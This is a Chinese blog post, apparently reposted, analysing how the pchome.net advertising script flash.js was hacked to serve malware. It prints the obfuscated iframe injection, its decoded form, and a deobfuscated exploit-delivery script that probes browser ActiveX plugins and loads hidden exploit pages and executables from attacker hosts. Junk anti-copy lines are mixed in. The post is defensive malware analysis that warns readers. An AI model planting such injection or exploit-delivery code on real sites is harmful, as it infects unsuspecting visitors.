挂得比较隐蔽，http://btn.pchome.net/flash.js的中间被加入了如下代码：

window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]('x3cx69x66x72x61x6dx65x68x65x69x67x68x74x3dx30x77x69x64x74x68x3dx30x73x72x63x3dx22x68x74x74x70x3ax2fx2fx77x77x77x2ex35x39x2ex76x63x2fx70x61x67x65x2fx61x64x64x5fx36x34x34x34x35x35x2ex68x74x6dx22x3ex3cx2fx69x66x72x61x6dx65x3e');

也就是这个了：

window["document"]["writeln"]('<iframeheight=0width=0src="http://www.59.vc/page/add_644455.htm"></iframe>');

但只有这个js还不会使得那个iframe生效，使得他生效的是调用这个js显示flash的代码：

<scriptlanguage="javascript"type="text/javascript">

writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf","_width=300","_height=250","_wmode=opaque");

</script>

有了这个，iframe就生效了；经过一番调用和解密后得：

functionbIsKIS(){for(i=2;i<26;i++){varkis6=newImage();varkis7=newImage();varroot=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":ProgramFilesKasperskyLabKasperskyInternetSecurity6.0Doccontext.chm::/images/help.gif";kis7.src="mk:@MSITStore:"+root+":ProgramFilesKasperskyLabKasperskyInternetSecurity7.0Doccontext.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)returntrue}returnfalse}varThen=newDate();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);varaaffdasfascookie=newString(document.cookie);varcookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(newActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie7")==-1)document.write('<iframestyle=display:nonesrc="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(newActiveXObject("DPClient.Vod"))document.write('<iframestyle=display:nonesrc="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(newActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(newActiveXObject("MPS.StormPlayer.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(newActiveXObject("BaiduBar.Tool.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}

Ｋ##Ｅ+ＸＤ++ＩＫ+ＥＸ=#Ｄ$ＩＫＥＸＤ+$Ｉ#ＫＥＸＤＩ+Ｋ$ＥＸ$ＤＩ$$ＫＥ##Ｘ#ＤＩ=Ｋ+Ｅ$Ｘ=$ＤＩ#Ｋ+#ＥＸ=ＤＩＫ=Ｅ$=ＸＤＩＫ=$ＥＸ=ＤＩＫ$Ｅ$#Ｘ=Ｄ=Ｉ##ＫＥ#=Ｘ+$Ｄ+

挑了几个解密得：http://w18.vg/s.exe

从这个文件里面得到另外一个链接：http://w18.vg/ss.exe

有点面熟的东西……

##Ｋ=Ｅ#Ｘ+Ｄ=ＩＫＥ$ＸＤ$=Ｉ==Ｋ+#ＥＸＤ=#Ｉ=ＫＥ$+ＸＤＩ#Ｋ$=ＥＸ=Ｄ=#ＩＫ+Ｅ=Ｘ$Ｄ==Ｉ=#Ｋ=Ｅ##Ｘ$Ｄ$+ＩＫ=#ＥＸＤ+ＩＫ$ＥＸ$=Ｄ+Ｉ+Ｋ#Ｅ$ＸＤ+ＩＫＥＸ#Ｄ

从上面可以知道，出问题的是那个flash.js，因此所有使用这个js来放flash的页面全都有毒了！我随便找了几个页面，发现都是有毒的，这回可是大面积的被挂咯，同志们自己小心了。

Ｋ$ＥＸ=+ＤＩ#$ＫＥ+Ｘ#ＤＩＫ$ＥＸＤ$Ｉ=ＫＥ$ＸＤ+#Ｉ+ＫＥＸＤ=Ｉ+ＫＥ=Ｘ$Ｄ=Ｉ=ＫＥＸＤ#=ＩＫ==Ｅ$Ｘ=Ｄ=Ｉ#+ＫＥＸＤ=ＩＫ#ＥＸ#ＤＩ=Ｋ=Ｅ=Ｘ=#ＤＩＫＥＸＤＩ#ＫＥ

转载请保留声明！（http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html）

【上周方法病毒来源竟然为ad.pchome.net原来被挂马】相关文章：

★ microsoft.exe病毒与清除方法

★ Worm.Win32.AutoRun.bqn病毒分析解决

★ sxs.exe 病毒专杀工具 最近更新

★ 通用病毒杀灭机1.0正式版发布 提供下载了

★ Symantec Norton Ghost v12.0 Retail ISO 多国语言版 下载

★ ctr+alt+del调不出任务管理器的解决方法

★ 遭遇www.investpoll.net病毒附手动删除方法

★ autorun.inf+无法显示隐藏文件+病毒的清除方法

★ 中病毒后常用的解决方法病毒终极解决方案

★ SREng用法简要图文说明[如何获得日志/删启动项目/服务/驱动/BHO等]